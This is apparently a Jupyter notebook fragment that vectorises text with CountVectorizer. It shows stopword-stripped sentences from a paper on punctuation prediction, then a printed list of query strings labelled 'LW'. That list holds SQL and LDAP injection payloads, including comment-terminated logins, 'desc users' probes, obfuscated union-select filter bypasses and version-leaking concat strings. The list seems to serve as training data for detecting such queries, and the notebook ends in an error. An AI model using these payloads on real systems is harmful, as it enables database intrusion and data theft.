 ' The experimental results show method achieve higher performance CRF-based baseline method',
 ' The paper structured follows: Section 2 conducts survey related work',
 ' The transitionbased dependency parsing introduced Section 3',
 ' We explain approach predicting punctuations transcribed speech texts Section 4',
 ' Section 5 gives results experiment',
 ' The conclusion future work given Section 6',
 ' Sentence boundary detection punctuation prediction extensively studied speech processing field attracted research interest natural language processing field well',
 ' Most previous work exploits local features task',
 ' Kim Woodland (2001), Huang Zweig (2002), Christensen et al',
 ' (2001), Liu et al',
 ' (2005) integrate prosodic features (pitch, pause duration, etc',
 ') lexical features (words, n-grams, etc',
 ') predict punctuation symbols speech recognition, Huang Zweig (2002) uses maximum entropy model, Christensen et al',
 ' (2001) focus finite state multi-layer perceptron methods, Liu et al',
 ' (2005) uses conditional random fields',
 ' However, scenarios prosodic cues available due inaccessible original raw speech waveforms',
 ' Matusov et al',
 ' (2006) integrate segmentation features log-linear model statistical machine translation (SMT) framework improve translation performance translating transcribed speech texts',
 ' Lu Ng (2010) uses dynamic conditional random fields perform sentence boundary sentence type prediction',
 ' They achieved promising results English Chinese transcribed speech texts',

In [14]:
vec2= CountVectorizer()
# X_s = vec_s.fit_transform(stmt_docs)
arr4=vec2.fit_transform(df_NV)
table_NV=pd.DataFrame(arr4.toarray(), columns=vec2.get_feature_names())
table_NV

,000,10,100,100aklima,116,12,125,13,138,14,...,york,yorkshire,you,young,your,yourself,youth,zhang,zigzag,zweig
0,0,0,0,0,0,0,0,0,0,0,...,0,0,0,0,0,0,0,0,0,0
1,0,0,0,0,0,0,0,0,0,0,...,0,0,0,0,0,0,0,0,0,0
2,0,0,0,0,0,0,0,0,0,0,...,0,0,0,0,0,0,0,0,0,0
3,0,0,0,0,0,0,0,0,0,0,...,0,0,0,0,0,0,0,0,0,0
4,0,0,0,0,0,0,0,0,0,0,...,0,0,0,0,0,0,0,0,0,0
...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...
596,0,0,0,0,0,0,0,0,0,0,...,0,0,0,0,0,0,0,0,0,0
597,0,0,0,0,0,0,0,0,0,0,...,0,0,0,0,0,0,0,0,0,0
598,0,0,0,0,0,0,0,0,0,0,...,0,0,0,0,0,0,0,0,0,0
599,0,0,0,0,0,0,0,0,0,0,...,0,0,0,0,0,0,0,0,0,0
600,0,0,0,0,0,0,0,0,0,0,...,0,0,0,0,0,0,0,0,0,0

In [22]:
df_lw = str([row['Query'] for index,row in df.iterrows() if row['Label'] == 'LW'])

df_lw

'["\' ;", \' #\', "\' -- --", "\' -- #", "\' -- %", "\' -- \'", "\') ;", "\') #", "\') -- --", "\') -- #", "\') -- %", "\') -- \'", "\'] ;", "\'] #", "\'] -- --", "\'] -- #", "\'] -- %", "\'] -- \'", "\' ;", \'" #\', \'" -- --\', \'" -- #\', \' -- %\', \'" -- \\\'\', "-\'", " \'", "&\'", "^\'", "*\'", \'"-"\', \'" "\', \'"&"\', \'"^"\', \'"*"\', "admin\' --", "admin\' #", "admin\'/*", \'admin" --\', \'admin" #\', \'admin"/*\', \'sqlvuln\', \'+sqlvuln\', \'sqlvuln;\', \' ( sqlvuln ) \', "a\'", \'?\', \'<>"\\\'%; )  ( &+\', \'sqlattempt1\', \' ( sqlattempt2 ) \', \'|\', \'%7C\', \'*|\', \'%2A%7C\', \'* ( | ( mail = *  )  )  \', \'%2A%28%7C%28mail%3D%2A%29%29\', \'* ( | ( objectclass = *  )  )  \', \'%2A%28%7C%28objectclass%3D%2A%29%29\', \' ( \', 0.28, \' ) \', 0.29, \'&\', 0.26, \'!\', 0.21, \'/\', \'//\', \'//*\', \'*/*\', \'*|\', \' --\', \'&\', \'//\', \'|\', "a\'", \'*/*\', \' ( \', \'/\', \' ) \', \'//*\', \'!\', \'&1c\', "a\' --", \' -- \', "1\\\\\'1", "1\'1", "\\\\\'; desc users; --", \'|| ( elt ( -3+5,bin ( 15 ) ,ord ( 10 ) ,hex ( char ( 45  )  )    )  )  \', \'||6\', "||\'6", \' ( ||6 ) \', \' having 1 = 1--\', \' having 1 = 1--\', \' group by userid having 1 = 1--\', \'password:*/ = 1--\', \'uni/**/on sel/**/ect\', \' -- &password = \', \'&1c\', \' ( s\', \' ) s\', \',s\', \'.s\', \'1s\', \';s\', \'?s\', \'{s\', \' @variable\', \',@variable\', \'PRINT\', \'PRINT @@variable\', \'*!%55NiOn*\', \'*!%53eLEct*\', \'\\xa0%55nion(%53elect\\xa01,2,3)--\\xa0-\', \'\\xa0concat(0x223e,@@version)\', \'concat(0x273e27,version(),0x3c212d2d)\', \'concat(0x223e3c62723e,version(),0x3c696d67207372633d22)\', 0.02, 0, \'*&\', \'%2A%2A\', \'‘’,@@\', \'*!\', \'*--*\', \'foo*%2\', \',’’)\', \'**//*!\', \'ion+se\', \'%0D%0A\', 0, \'pwd\', \'!=\', \'<>\', \'?id\', \'*%2\', \'%20/*!\', \'*!50000\', \'+#1q%0A\', 0.06, \'*!\', \'+1,2,3+\', \'"+\', 0, \'etc.\', 0.55, \'%0b\', \'/**/\', \'%0A\', \'%0A/*!%\', \'/*,*/\', "\'1\'", \'%2f\', \'?%\', "\'A\'", \'*!se%6cect*\', \'#####\', \'*sel\\xa0X\\xa0ect*\', \'*!12345\', \'%0A#%0A\', \'!%5\', \',1,1\', \'*! *\', \'**/1,2,3--\', \'+1,2,3--\', " 1-- -\'", \'\\\'1"\', \'".$\', \'--\', \'@\', 0.2, \',%20\']'

In [23]:
vec5= CountVectorizer()

In [25]:
arr5=vec5.fit_transform(input.df_lw)
table_LW=pd.DataFrame(arr5.toarray(), columns=vec2.get_feature_names())

AttributeError: 'function' object has no attribute 'df_lw'